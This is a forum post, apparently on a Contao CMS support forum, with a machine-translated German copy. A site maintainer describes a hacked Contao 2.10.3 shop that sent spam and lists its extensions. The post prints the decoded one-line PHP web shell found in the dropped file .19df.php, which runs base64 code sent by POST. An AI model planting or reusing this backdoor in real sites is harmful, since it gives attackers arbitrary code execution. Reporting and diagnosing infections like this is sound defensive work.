I'm posting this in the German forum because this might be pretty important, but I don't yet know for sure where the problem lies and what to do. I have a standard 2.10.3 Contao installation with several extensions as listed below. The installation seems to catch a virus of which I haven't yet been able to trace the origins of. The virus tries to spam e-mail using the server via a file that is added which contains base64 encoded text. When decoded this is the content of the file .19df.php:
That code would basically allow whoever put it on to do just about anything. But the hosting party keeps disabling the website when I put it back online, claiming there is a virus without giving me any more information. I was lucky to catch the file above before the host did.Code:if(isset($_POST["code"])) { eval(base64_decode($_POST["code"])); }
So I guess my question is; were to best look. The customer does not have FTP data to the website, none of about 80 sites my computer can access seem infected either nor has my computer a virus (concluded after extensive scanning with 4 different programs). That leaves open the webhost or Contao/Extensions.
I never had a problem with Contao thusfar so my first reaction was "nope, not the CMS at fault", but then how do I know for sure? Looking up the filename and contents a possible vulnarability would be misconfigured forms (the website has a contact form and forms for e-commerce). I will ask the host the filename and date of the new file, so I can see if a form was submitted.
Extensions:
Code:ajax 1.0.7 stable 3 conditionalselectmenu 1.1.2 stable 12 dcawizard 1.2.0 beta2 4 googleanalytics 1.3.3 stable 6 isotope 1.3.0 rc1 20 isotope_payment_icepay 1.0.0 stable 19 isotope_payment_ideal 1.0.1 stable 23 MultiTextWizard 1.1.3 stable 5 tablelookupwizard 1.1.2 stable 4
Translation (by Google translate)
Ich frage mal im deutschen Forum, da dies möglicherweise ziemlich wichtig, aber ich weiß noch nicht genau wissen wo das Problem liegt und was zu tun ist. Ich habe einen Standard 2.10.3 Contao Installation mit mehreren Erweiterungen wie unten aufgeführt. Die Installation scheint ein Virus, von dem ich noch nicht gelungen, die Herkunft von Spuren zu fangen. Der Virus versucht, E-Mail-Spam mit dem Server über eine Datei, die hinzugefügt, enthält base64-codierten Text. Wenn decodiert das ist der Inhalt der Datei 0,19 df.php:
(the code)
Dieser Code würde im Grunde erlauben wer legte es auf, um so ziemlich alles tun. Aber die Hosting-Partei hält das Deaktivieren der Website, wenn ich es wieder online und behauptete, es ist ein Virus, ohne mir mehr Informationen. Ich hatte das Glück, um die Datei oben zu fangen, bevor der Gastgeber tat.
Also ich denke, meine Frage ist, wurden am besten aussehen. Der Kunde hat keinen FTP-Daten auf der Website kann keine der etwa 80 Seiten meines Computers zugreifen entweder infiziert scheinen noch hat mein Computer ein Virus (Schluss nach umfangreichen Scan mit 4 verschiedenen Programmen). Das lässt die Webhost oder Contao / Extensions.
Ich hatte nie ein Problem mit Contao Dies tue ich so meine erste Reaktion "Nö, nicht das CMS" war, dann aber wie kann ich sicher sein? Looking up den Dateinamen und den Inhalt einer möglichen vulnarability wäre falsch konfigurierte Formulare (die Webseite hat ein Kontaktformular und Formulare für E-Commerce) zu sein. Ich werde fragen, der Host der Dateiname und das Datum der neuen Datei, so kann ich sehen, ob ein Formular abgeschickt wurde.
Lesezeichen